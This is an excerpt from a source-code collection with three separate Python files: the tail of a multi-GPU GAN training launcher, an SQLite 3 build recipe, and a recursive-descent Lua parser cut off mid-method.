    args.D_opt_kwargs = dnnlib.EasyDict(class_name='torch.optim.Adam', lr=lrate, betas=[0,0.99], eps=1e-8)
    args.loss_kwargs = dnnlib.EasyDict(class_name='training.loss.SOMGANLoss', r1_gamma=default_gamma)
    args.total_kimg = default_kimg
    args.batch_size = default_mb
    args.batch_gpu = default_mb // gpus
    args.ema_kimg = default_ema
    args.ema_rampup = None
    # Explicit CLI overrides of the defaults above.
    if gamma is not None:
        assert isinstance(gamma, float)
        if not gamma >= 0:
            raise UserError('--gamma must be non-negative')
        desc += f'-gamma{gamma:g}'
        args.loss_kwargs.r1_gamma = gamma
    if kimg is not None:
        assert isinstance(kimg, int)
        if not kimg >= 1:
            raise UserError('--kimg must be at least 1')
        desc += f'-kimg{kimg:d}'
        args.total_kimg = kimg
    if batch is not None:
        assert isinstance(batch, int)
        if not (batch >= 1 and batch % gpus == 0):
            raise UserError('--batch must be at least 1 and divisible by --gpus')
        desc += f'-batch{batch}'
        args.batch_size = batch
        args.batch_gpu = batch // gpus
    # ---------------------------------------------------
    # Discriminator augmentation: aug
    # ---------------------------------------------------
    if aug is None:
        aug = 'ada'
    else:
        assert isinstance(aug, str)
        # NOTE(review): an explicit --aug=ada yields a '-ada-ada' desc suffix
        # (again appended below) -- confirm this is intentional.
        desc += f'-{aug}'
    if aug == 'ada':
        args.ada_target = 0.6
        bgc = dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1)
        args.augment_kwargs = dnnlib.EasyDict(class_name='training.augment.AugmentPipe', **bgc)
        desc += f'-ada'
    elif aug == 'noaug':
        pass
    else:
        # NOTE(review): the CLI advertises 'fixed' as a choice, but it is not
        # handled here and therefore always raises -- confirm intended.
        raise UserError(f'--aug={aug} not supported')
    # ----------------------------------
    # Transfer learning: resume
    # ----------------------------------
    assert resume is None or isinstance(resume, str)
    if resume is None:
        resume = 'noresume'
    elif resume == 'noresume':
        desc += '-noresume'
    else:
        desc += '-resumecustom'
        args.resume_pkl = resume # custom path or url
    if resume != 'noresume':
        args.ada_kimg = 100 # make ADA react faster at the beginning
        args.ema_rampup = None # disable EMA rampup
    desc += f'-{gpus:d}gpu'
    return desc, args
#----------------------------------------------------------------------------
def subprocess_fn(rank, args, temp_dir):
    """Training entry point for one (possibly distributed) process.

    rank: this process's index in [0, args.num_gpus).
    temp_dir: scratch directory shared by all ranks, used for the file-based
    torch.distributed rendezvous.
    """
    dnnlib.util.Logger(file_name=os.path.join(args.run_dir, 'log.txt'), file_mode='a', should_flush=True)
    # Init torch.distributed.
    if args.num_gpus > 1:
        init_file = os.path.abspath(os.path.join(temp_dir, '.torch_distributed_init'))
        if os.name == 'nt':
            # Windows: gloo backend, file:// URL needs forward slashes.
            init_method = 'file:///' + init_file.replace('\\', '/')
            torch.distributed.init_process_group(backend='gloo', init_method=init_method, rank=rank, world_size=args.num_gpus)
        else:
            init_method = f'file://{init_file}'
            torch.distributed.init_process_group(backend='nccl', init_method=init_method, rank=rank, world_size=args.num_gpus)
    # Init torch_utils.
    sync_device = torch.device('cuda', rank) if args.num_gpus > 1 else None
    training_stats.init_multiprocessing(rank=rank, sync_device=sync_device)
    if rank != 0:
        # Silence custom-op build chatter on non-primary ranks.
        custom_ops.verbosity = 'none'
    # Execute training loop.
    training_loop.training_loop(rank=rank, **args)
@click.command()
@click.pass_context
# General options.
@click.option('--outdir', help='Where to save the results', required=True, metavar='DIR')
@click.option('--gpus', help='Number of GPUs to use [default: 1]', type=int, metavar='INT')
@click.option('--snap', help='Snapshot interval [default: 50 ticks]', type=int, metavar='INT')
@click.option('-n', '--dry-run', help='Print training options and exit', is_flag=True)
# Dataset.
@click.option('--data', help='Training data (directory or zip)', metavar='PATH', required=True)
@click.option('--mirror', help='Enable dataset x-flips [default: false]', type=bool, metavar='BOOL')
# Base config.
@click.option('--kimg', help='Override training duration', type=int, metavar='INT')
@click.option('--gamma', help='Override R1 gamma', type=float)
@click.option('--batch', help='Override batch size', type=int, metavar='INT')
# Discriminator augmentation.
@click.option('--aug', help='Augmentation mode [default: ada]', type=click.Choice(['noaug', 'ada', 'fixed']))
@click.option('--num_d', help='Number of discriminators [default: 1', type=int, metavar='INT')
@click.option('--topo', help='Topology constraint type [default: grid]', type=click.Choice(['grid', 'triangle']))
# Transfer learning.
@click.option('--resume', help='Resume training [default: noresume]', metavar='PKL')
def main(ctx, outdir, dry_run, **config_kwargs):
    """Validate options, create the run directory, and launch training."""
    dnnlib.util.Logger(should_flush=True)
    # Setup training options.
    try:
        run_desc, args = setup_training_loop_kwargs(**config_kwargs)
    except UserError as err:
        ctx.fail(err)
    # Pick output directory: next sequential 5-digit run id under outdir.
    prev_run_dirs = []
    if os.path.isdir(outdir):
        prev_run_dirs = [x for x in os.listdir(outdir) if os.path.isdir(os.path.join(outdir, x))]
    prev_run_ids = [re.match(r'^\d+', x) for x in prev_run_dirs]
    prev_run_ids = [int(x.group()) for x in prev_run_ids if x is not None]
    cur_run_id = max(prev_run_ids, default=-1) + 1
    args.run_dir = os.path.join(outdir, f'{cur_run_id:05d}-{run_desc}')
    assert not os.path.exists(args.run_dir)
    # Print options.
    print()
    print('Training options:')
    print(json.dumps(args, indent=2))
    print()
    print(f'Output directory: {args.run_dir}')
    print(f'Training data: {args.training_set_kwargs.path}')
    print(f'Training duration: {args.total_kimg} kimg')
    print(f'Number of GPUs: {args.num_gpus}')
    print(f'Number of Discriminators: {args.num_D}')
    print(f'Topological constraints of Discriminators: {args.topo}')
    print(f'Image resolution: {args.training_set_kwargs.resolution}')
    print(f'Dataset x-flips: {args.training_set_kwargs.xflip}')
    print()
    # Dry run?
    if dry_run:
        print('Dry run; exiting.')
        return
    # Create output directory and persist the resolved options.
    print('Creating output directory...')
    os.makedirs(args.run_dir)
    with open(os.path.join(args.run_dir, 'training_options.json'), 'wt') as f:
        json.dump(args, f, indent=2)
    # Launch processes: in-process for 1 GPU, spawned workers otherwise.
    print('Launching processes...')
    torch.multiprocessing.set_start_method('spawn')
    with tempfile.TemporaryDirectory() as temp_dir:
        if args.num_gpus == 1:
            subprocess_fn(rank=0, args=args, temp_dir=temp_dir)
        else:
            torch.multiprocessing.spawn(fn=subprocess_fn, args=(args, temp_dir), nprocs=args.num_gpus)
if __name__ == "__main__":
main() | StarcoderdataPython |
3242949 | from .base import GnuRecipe
from ..version import Versions
class Sqlite3Recipe(GnuRecipe):
    """Build recipe for SQLite 3 (autoconf amalgamation tarball)."""
    def __init__(self, *args, **kwargs):
        super(Sqlite3Recipe, self).__init__(*args, **kwargs)
        # SHA-256 of the source tarball (split only for line length).
        self.sha256 = 'd9d14e88c6fb6d68de9ca0d1f9797477' \
                      'd82fc3aed613558f87ffbdbbc5ceb74a'
        self.name = 'sqlite3'
        self.version = '3.24.0'
        # Doesn't work because version is not in href
        # Download URLs encode the version as e.g. 3.24.0 -> '3240000'.
        long_version = self.version.replace('.', '') + '000'
        self.url = 'https://www.sqlite.org/2018/sqlite-autoconf-%s.tar.gz' % \
            long_version
        self.version_url = 'https://sqlite.org/changes.html'
        # NOTE(review): non-raw string relies on '\d' passing through
        # unescaped -- consider an r'' prefix.
        self.version_regex = '\d\d\d\d-\d\d-\d\d [(](?P<version>\d+.\d+.\d+)[)]'
        self.depends = ['readline']
        self.configure_args += [
            '--enable-fts5',
            '--enable-json1',
            '--enable-readline',
            '--enable-threadsafe',
            '--enable-shared',
            '--enable-static',
            '--enable-dynamic-extensions'
        ]
        # firefox and QT requires this
        self.environment['CFLAGS'] += \
            ' -DSQLITE_SECURE_DELETE=1' \
            ' -DSQLITE_ENABLE_UNLOCK_NOTIFY=1' \
            ' -DSQLITE_ENABLE_DBSTAT_VTAB=1' \
            ' -DSQLITE_ENABLE_COLUMN_METADATA=1'
    # def version_transform(self, v):
    #     return v[:1] + '.' + v[1:3] + '.' + v[4:]
    def get_version_always(self):
        """Scrape the latest version from the changes page (non-link text)."""
        return Versions.get_non_link_versions(
            self.version_url, self.version_regex)
| StarcoderdataPython |
11888 | <filename>parser.py<gh_stars>0
import lexer
import ast
class Parser:
    """Recursive-descent Lua parser over a token stream from ``lexer``.

    Expression parsing uses precedence climbing driven by ``priority_table``;
    asymmetric left/right priorities encode associativity (e.g. ``^`` and
    ``..`` are right-associative).
    """
    # Token kinds that may legally terminate a block without being consumed.
    block_end_tokens = [lexer.TokenKind.KW_RETURN, lexer.TokenKind.EOF,
                        lexer.TokenKind.KW_END, lexer.TokenKind.KW_ELSE,
                        lexer.TokenKind.KW_ELSEIF, lexer.TokenKind.KW_UNTIL]
    # Binary-operator binding powers; 'left' gates whether a climb continues,
    # 'right' is the minimum priority passed to the right operand.
    priority_table = {
        lexer.TokenKind.OP_ADD: {'left': 10, 'right': 10},  # +
        lexer.TokenKind.OP_SUB: {'left': 10, 'right': 10},  # -
        lexer.TokenKind.OP_MUL: {'left': 11, 'right': 11},  # *
        lexer.TokenKind.OP_MOD: {'left': 11, 'right': 11},  # %
        lexer.TokenKind.OP_DIV: {'left': 11, 'right': 11},  # /
        lexer.TokenKind.OP_IDIV: {'left': 11, 'right': 11},  # //
        lexer.TokenKind.OP_POW: {'left': 14, 'right': 13},  # ^
        lexer.TokenKind.OP_BAND: {'left': 6, 'right': 6},  # &
        lexer.TokenKind.OP_BOR: {'left': 4, 'right': 4},  # |
        lexer.TokenKind.OP_BNOT: {'left': 5, 'right': 5},  # ~
        lexer.TokenKind.OP_SHL: {'left': 7, 'right': 7},  # <<
        lexer.TokenKind.OP_SHR: {'left': 7, 'right': 7},  # >>
        lexer.TokenKind.OP_CONCAT: {'left': 9, 'right': 8},  # ..
        lexer.TokenKind.OP_EQ: {'left': 3, 'right': 3},  # ==
        lexer.TokenKind.OP_LE: {'left': 3, 'right': 3},  # <=
        lexer.TokenKind.OP_LT: {'left': 3, 'right': 3},  # <
        lexer.TokenKind.OP_NE: {'left': 3, 'right': 3},  # ~=
        lexer.TokenKind.OP_GT: {'left': 3, 'right': 3},  # >
        lexer.TokenKind.OP_GE: {'left': 3, 'right': 3},  # >=
        lexer.TokenKind.OP_AND: {'left': 2, 'right': 2},  # and
        lexer.TokenKind.OP_OR: {'left': 1, 'right': 1},  # or
    }
    unops = [
        lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_NOT,
        lexer.TokenKind.OP_LEN, lexer.TokenKind.OP_BNOT
    ]
    # NOTE(review): priority_table lists OP_BNOT for binary '~' while this
    # binops list contains OP_BXOR -- one side looks inconsistent; confirm
    # which kind the lexer emits for the binary xor operator.
    binops = [
        lexer.TokenKind.OP_ADD, lexer.TokenKind.OP_SUB,
        lexer.TokenKind.OP_MUL, lexer.TokenKind.OP_MOD,
        lexer.TokenKind.OP_POW, lexer.TokenKind.OP_DIV,
        lexer.TokenKind.OP_IDIV, lexer.TokenKind.OP_BAND,
        lexer.TokenKind.OP_BOR, lexer.TokenKind.OP_BXOR,
        lexer.TokenKind.OP_SHL, lexer.TokenKind.OP_SHR,
        lexer.TokenKind.OP_CONCAT, lexer.TokenKind.OP_NE,
        lexer.TokenKind.OP_EQ, lexer.TokenKind.OP_LT,
        lexer.TokenKind.OP_LE, lexer.TokenKind.OP_GT,
        lexer.TokenKind.OP_GE, lexer.TokenKind.OP_AND,
        lexer.TokenKind.OP_OR
    ]
    # Operand priority for unary operators (tighter than all binops but '^').
    unary_priority = 12
    def __init__(self, lex):
        self.lex = lex  # token source providing look_ahead()/next_token()
def parse(self):
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.EOF)
return block
# explist ::= exp {‘,’ exp}
def parse_exp_list(self):
exp_list = []
exp_list.append(self.parse_exp(0)[1])
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
exp_list.append(self.parse_exp(0)[1])
return exp_list
    # exp ::= (simpleexp | unop exp) {binop exp}
    def parse_exp(self, prev_priority):
        """Precedence-climbing expression parser.

        Returns (next_op_kind, exp): the AST for the parsed expression plus
        the kind of the token now at the lookahead, so callers can continue
        the climb without re-peeking.
        """
        token = self.lex.look_ahead()
        if token.kind in self.unops:
            self.lex.next_token()
            # Unary operand binds at unary_priority (tighter than binops
            # except '^').
            op_left = ast.UnopExp(self.parse_exp(self.unary_priority)[1], token.kind)
        else:
            op_left = self.parse_simple_exp()
        bin_op = self.lex.look_ahead().kind
        # Keep absorbing operators that bind tighter than our caller's level.
        while bin_op in self.binops and self.priority_table[bin_op]['left'] > prev_priority:
            bin_op, op_left = self.parse_binop_exp(op_left, self.priority_table[bin_op]['right'])
        return bin_op, op_left
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_func_args(self):
look_token = self.lex.look_ahead()
exp_list = []
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RPAREN:
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
exp_list = [self.parse_table_constructor_exp()]
else:
exp_list = [ast.String(self.lex.next_token_of_kind(lexer.TokenKind.STRING)).data]
return exp_list
    # simpleexp ::= nil | false | true | Numeral | LiteralString | '...' |
    #               functiondef | prefixexp | tableconstructor
    def parse_simple_exp(self):
        """Dispatch on the lookahead token to parse one simple expression.

        Literal tokens are consumed here; composite forms are delegated to
        their dedicated parse methods (which consume their own tokens).
        """
        look_token = self.lex.look_ahead()
        if look_token.kind == lexer.TokenKind.KW_NIL:
            self.lex.next_token()
            return ast.NilExp()
        elif look_token.kind == lexer.TokenKind.KW_FALSE:
            self.lex.next_token()
            return ast.BoolConstExp(False)
        elif look_token.kind == lexer.TokenKind.KW_TRUE:
            self.lex.next_token()
            return ast.BoolConstExp(True)
        elif look_token.kind == lexer.TokenKind.NUMBER:
            return self.parse_number_exp()
        elif look_token.kind == lexer.TokenKind.STRING:
            self.lex.next_token()
            return ast.StringExp(look_token.data)
        elif look_token.kind == lexer.TokenKind.VARARG:
            self.lex.next_token()
            return ast.VarargExp()
        elif look_token.kind == lexer.TokenKind.KW_FUNCTION:
            return self.parse_func_def_exp()
        elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
            return self.parse_table_constructor_exp()
        else:
            # Anything else must be a prefix expression (name/index/call).
            return self.parse_prefix_exp()
def parse_func_def_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_body_exp = self.parse_func_body_exp(False)
return func_body_exp
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_table_constructor_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LCURLY)
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RCURLY:
key_list, val_list = self.parse_field_list()
else:
key_list = []
val_list = []
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RCURLY)
return ast.TableConstructorExp(key_list, val_list)
    # fieldlist ::= field {fieldsep field} [fieldsep]
    # fieldsep ::= ',' | ';'
    def parse_field_list(self):
        """Parse one or more table fields; returns parallel (keys, vals) lists.

        A trailing ',' or ';' immediately before '}' is consumed without
        expecting another field.
        """
        key, val = self.parse_field()
        key_list = [key]
        val_list = [val]
        while self.lex.look_ahead().kind in [lexer.TokenKind.SEP_COMMA, lexer.TokenKind.SEP_SEMI]:
            self.lex.next_token()
            if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RCURLY:
                break  # trailing separator before '}'
            else:
                key, val = self.parse_field()
                key_list.append(key)
                val_list.append(val)
        return key_list, val_list
# field ::= ‘[’ exp ‘]’ ‘=’ exp | Name ‘=’ exp | exp
def parse_field(self):
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
key_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
exp = self.parse_exp(0)[1]
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
if not isinstance(exp, ast.NameExp):
raise Exception("syntax error near '%s'" % token)
self.lex.next_token()
key_exp = ast.StringExp(exp.id_name)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
return ast.NilExp(), exp
# binop exp
    def parse_binop_exp(self, op_left, prev_priority):
        """Parse the right-hand side of a binary operator expression.

        *op_left* is the already-parsed left operand; *prev_priority* is
        passed through to parse_exp to honour operator precedence.
        Returns (bin_op, BinopExp) mirroring parse_exp's pair shape.
        """
        token = self.lex.next_token()
        if token.kind not in self.binops:
            raise Exception("syntax error near '%s'" % token)
        bin_op, op_right = self.parse_exp(prev_priority)
        return bin_op, ast.BinopExp(op_left, op_right, token.kind)
    def parse_number_exp(self):
        """Parse a numeric literal into an IntegerExp or FloatExp."""
        token = self.lex.next_token_of_kind(lexer.TokenKind.NUMBER)
        # NOTE(review): eval() trusts the lexer to have produced a pure
        # numeric literal; safe only for lexer-validated input.
        val = eval(token.data)
        if isinstance(val, int):
            return ast.IntegerExp(val)
        else:
            return ast.FloatExp(val)
# retstat ::= return [explist] [‘;’]
    def parse_retstat(self):
        """Parse retstat ::= return [explist] [';'].

        The expression list is omitted when the next token ends the block
        or is ';' (a bare ``return``).
        """
        self.lex.next_token_of_kind(lexer.TokenKind.KW_RETURN)
        exp_list = []
        token = self.lex.look_ahead()
        if not self.is_block_end(token.kind) and token.kind != lexer.TokenKind.SEP_SEMI:
            exp_list = self.parse_exp_list()
        return ast.RetStat(exp_list)
# block ::= {stat} [retstat]
def parse_block(self):
stats = self.parse_stats()
block = ast.Block(stats)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_RETURN:
retstat = self.parse_retstat()
block.append_stat(retstat)
return block
    def parse_goto_stat(self):
        """Parse 'goto Name'; the label token itself is stored in the AST."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_GOTO)
        label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
        return ast.GotoStat(label)
    def parse_do_stat(self):
        """Parse 'do block end'."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
        block = self.parse_block()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
        return ast.DoStat(block)
    def parse_while_stat(self):
        """Parse 'while exp do block end'."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_WHILE)
        exp = self.parse_exp(0)[1]
        self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
        block = self.parse_block()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
        return ast.WhileStat(exp, block)
    def parse_repeat_stat(self):
        """Parse 'repeat block until exp' (condition follows the body)."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_REPEAT)
        block = self.parse_block()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_UNTIL)
        exp = self.parse_exp(0)[1]
        return ast.RepeatStat(exp, block)
    def parse_if_stat(self):
        """Parse 'if exp then block {elseif exp then block} [else block] end'.

        Conditions and bodies are collected into parallel lists; a plain
        'else' is normalised into an elseif with a constant-true condition
        so IfStat only has to handle one shape.
        """
        exp_list = []
        block_list = []
        self.lex.next_token_of_kind(lexer.TokenKind.KW_IF)
        exp = self.parse_exp(0)[1]
        exp_list.append(exp)
        self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
        block = self.parse_block()
        block_list.append(block)
        while self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSEIF:
            self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSEIF)
            exp_list.append(self.parse_exp(0)[1])
            self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
            block_list.append(self.parse_block())
        if self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSE:
            self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSE)
            # 'else' == 'elseif true then'
            exp_list.append(ast.BoolConstExp(True))
            block_list.append(self.parse_block())
        self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
        return ast.IfStat(exp_list, block_list)
    def parse_for_stat(self):
        """Parse a 'for' statement, disambiguating the numeric and generic
        forms by whether '=' follows the first name."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_FOR)
        name = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
        if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
            return self.finish_for_num_stat(name)
        else:
            return self.finish_for_in_stat(name)
    def finish_for_num_stat(self, var):
        """Finish 'for Name = exp, exp [, exp] do block end'.

        *var* is the already-parsed loop variable. step_exp stays None
        when the optional step is omitted.
        """
        self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
        init_exp = self.parse_exp(0)[1]
        self.lex.next_token_of_kind(lexer.TokenKind.SEP_COMMA)
        limit_exp = self.parse_exp(0)[1]
        step_exp = None
        if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
            self.lex.next_token()
            step_exp = self.parse_exp(0)[1]
        self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
        block = self.parse_block()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
        return ast.ForNumStat(var, init_exp, limit_exp, step_exp, block)
    def finish_for_in_stat(self, name):
        """Finish 'for namelist in explist do block end'.

        *name* is the first loop name, already consumed by parse_for_stat.
        """
        var_list = self.parse_name_list(name)
        self.lex.next_token_of_kind(lexer.TokenKind.KW_IN)
        exp_list = self.parse_exp_list()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
        block = self.parse_block()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
        return ast.ForInStat(var_list, exp_list, block)
    def parse_func_def_stat(self):
        """Parse 'function funcname funcbody', desugared into an assignment
        of the function value to the (possibly dotted/colon) name."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
        func_name_exp, has_colon = self.parse_func_name_exp()
        func_body_exp = self.parse_func_body_exp(has_colon)
        return ast.AssignStat([func_name_exp], [func_body_exp])
# parlist ::= namelist [‘,’ ‘...’] | ‘...’
# namelist ::= Name {‘,’ Name}
    def parse_parlist(self):
        """Parse parlist ::= namelist [',' '...'] | '...' (possibly empty).

        Returns (parlist, is_var_arg): the parameter names as StringExps
        and whether the list ends in '...'.
        """
        parlist = []
        is_var_arg = False
        if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RPAREN:
            # Empty parameter list: '()'.
            return parlist, is_var_arg
        if self.lex.look_ahead().kind == lexer.TokenKind.VARARG:
            # Bare '...' with no named parameters.
            is_var_arg = True
            self.lex.next_token()
            return parlist, is_var_arg
        parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
        while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
            self.lex.next_token()
            if self.lex.look_ahead().kind == lexer.TokenKind.IDENTIFIER:
                parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
            else:
                # '...' is only legal as the final entry.
                self.lex.next_token_of_kind(lexer.TokenKind.VARARG)
                is_var_arg = True
                break
        return parlist, is_var_arg
# funcbody ::= ‘(’ [parlist] ‘)’ block end
    def parse_func_body_exp(self, has_colon):
        """Parse funcbody ::= '(' [parlist] ')' block end.

        When *has_colon* is true (method definition via ':'), an implicit
        'self' parameter is prepended to the parameter list.
        """
        self.lex.next_token_of_kind(lexer.TokenKind.SEP_LPAREN)
        parlist, is_var_arg = self.parse_parlist()
        self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
        if has_colon:
            parlist.insert(0, ast.StringExp('self'))
        body = self.parse_block()
        self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
        return ast.FunctionDefExp(parlist, is_var_arg, body)
# funcname ::= Name {‘.’ Name} [‘:’ Name]
    def parse_func_name_exp(self):
        """Parse funcname ::= Name {'.' Name} [':' Name].

        Dotted and colon segments both become nested TableAccessExps;
        has_colon reports whether the final segment used ':' (method
        definition, which adds an implicit 'self' parameter downstream).
        """
        has_colon = False
        name_exp = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
        while self.lex.look_ahead().kind == lexer.TokenKind.SEP_DOT:
            self.lex.next_token()
            name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
        if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COLON:
            self.lex.next_token()
            name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
            has_colon = True
        return name_exp, has_colon
def parse_local_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_LOCAL)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_local_func_def_stat()
else:
return self.parse_local_var_decl_stat()
# namelist ::= Name {‘,’ Name}
    def parse_name_list(self, name=None):
        """Parse namelist ::= Name {',' Name}.

        If *name* is given it seeds the list (the caller already consumed
        the first identifier). NOTE(review): a seeded first entry keeps
        the caller's node type (e.g. NameExp) while the rest are
        StringExps -- confirm downstream consumers accept both.
        """
        if name:
            var_list = [name]
        else:
            var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
        while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
            self.lex.next_token()
            var_list.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
        return var_list
# local function Name funcbody
    def parse_local_func_def_stat(self):
        """Parse 'local function Name funcbody' into a LocalDeclStat."""
        self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
        var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
        exp_list = [self.parse_func_body_exp(False)]
        return ast.LocalDeclStat(var_list, exp_list)
# local namelist [‘=’ explist]
    def parse_local_var_decl_stat(self):
        """Parse 'local namelist ['=' explist]'; exp_list stays empty for a
        bare declaration."""
        var_list = self.parse_name_list()
        exp_list = []
        if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
            self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
            exp_list = self.parse_exp_list()
        return ast.LocalDeclStat(var_list, exp_list)
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
# functioncall ::= prefixexp args | prefixexp ‘:’ Name args
# prefixexp ::= var | functioncall | ‘(’ exp ‘)’
# prefixexp ::= prefixexp args
# | prefixexp ‘:’ Name args
# | prefixexp ‘[’ exp ‘]’
# | prefixexp ‘.’ Name
# | ‘(’ exp ‘)’
# | Name
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
    def parse_prefix_exp(self):
        """Parse a prefixexp: a Name or parenthesised expression followed by
        any number of '.' / ':' accesses, '[exp]' indexes, and call args.

        The loop folds each suffix into *exp* left-to-right, so chains like
        a.b[c]:d(e) build nested TableAccessExp/FunctionCallExp nodes.
        """
        look_token = self.lex.look_ahead()
        if look_token.kind == lexer.TokenKind.SEP_LPAREN:
            # '(' exp ')'
            self.lex.next_token()
            exp = self.parse_exp(0)[1]
            self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
        else:
            name = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
            exp = ast.NameExp(name.data)
        while True:
            look_token = self.lex.look_ahead()
            if look_token.kind == lexer.TokenKind.SEP_DOT:
                # prefixexp '.' Name
                self.lex.next_token()
                idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
                exp = ast.TableAccessExp(exp, idx_exp)
            elif look_token.kind == lexer.TokenKind.SEP_COLON:
                # prefixexp ':' Name args -- method call; the receiver is
                # passed as the first argument.
                self.lex.next_token()
                args_exp = [exp]
                idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
                exp = ast.TableAccessExp(exp, idx_exp)
                args_exp.extend(self.parse_func_args())
                exp = ast.FunctionCallExp(exp, args_exp)
            elif look_token.kind in [lexer.TokenKind.SEP_LPAREN, lexer.TokenKind.SEP_LCURLY, lexer.TokenKind.STRING]:
                # Plain call: args may be '(...)', a table ctor, or a string.
                args_exp = self.parse_func_args()
                exp = ast.FunctionCallExp(exp, args_exp)
            elif look_token.kind == lexer.TokenKind.SEP_LBRACK:
                # prefixexp '[' exp ']'
                self.lex.next_token()
                idx_exp = self.parse_exp(0)[1]
                exp = ast.TableAccessExp(exp, idx_exp)
                self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
            else:
                break
        return exp
# varlist ‘=’ explist
# functioncall
    def parse_assign_or_func_call_stat(self):
        """Disambiguate an assignment from a bare function call statement.

        Both start with a prefixexp; '=' or ',' after it means assignment,
        otherwise only a call expression is a legal statement.
        """
        exp = self.parse_prefix_exp()
        look_token = self.lex.look_ahead()
        if look_token.kind in [lexer.TokenKind.OP_ASSIGN, lexer.TokenKind.SEP_COMMA]:
            return self.finsh_assign_stat(exp)
        elif isinstance(exp, ast.FunctionCallExp):
            return exp
        else:
            raise Exception("syntax error near '%s'" % look_token)
def check_var(self, exp):
if isinstance(exp, ast.TableAccessExp) or isinstance(exp, ast.NameExp):
return exp
raise Exception("syntax error near '%s'" % token)
# varlist ‘=’ explist
# varlist ::= var {‘,’ var}
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
    # NOTE(review): method name is a typo for "finish_assign_stat" but is
    # part of the class's interface; renaming would break callers.
    def finsh_assign_stat(self, first_var):
